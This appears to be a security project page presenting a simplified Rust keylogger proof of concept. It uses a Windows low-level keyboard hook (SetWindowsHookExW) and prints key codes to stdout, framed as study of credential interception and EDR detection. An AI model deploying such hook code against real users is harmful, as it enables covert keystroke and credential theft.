EXPERIMENT_ID: 001

Rust Keylogger PoC

ARCHIVED

A Windows-based keylogger demonstrating the usage of `SetWindowsHookEx` and proper hook chaining for educational detection analysis.

OBJECTIVE

Understand how Windows messaging hooks can be abused for credential interception and how EDRs detect hook injection.

CONSTRAINTS

Educational purpose only. Does not persist across reboots. Logs to stdout only.

Rust WinAPI Unsafe

src/main.rust

1
2// WinAPI Hook Structure (Simplified)
3unsafe extern "system" fn hook_callback(code: i32, wParam: WPARAM, lParam: LPARAM) -> LRESULT {
4    if code >= 0 && wParam.0 as u32 == WM_KEYDOWN {
5        let kbd_struct = *(lParam.0 as *const KBDLLHOOKSTRUCT);
6        // Process virtual key code
7        println!("Key Intercepted: {}", kbd_struct.vkCode);
8    }
9    // Always pass to next hook in chain to avoid breaking input
10    CallNextHookEx(HOOK_HANDLE, code, wParam, lParam)
11}
12
13fn main() {
14    let hook_id = unsafe {
15        SetWindowsHookExW(
16            WH_KEYBOARD_LL,
17            Some(hook_callback),
18            std::ptr::null_mut(),
19            0
20        )
21    };
22    // Pump messages to keep hook alive
23    let mut msg = MSG::default();
24    while unsafe { GetMessageW(&mut msg, std::ptr::null_mut(), 0, 0) } > 0 {
25        unsafe {
26            TranslateMessage(&msg);
27            DispatchMessageW(&msg);
28        }
29    }
30}

READ_ONLY_MODEUTF-8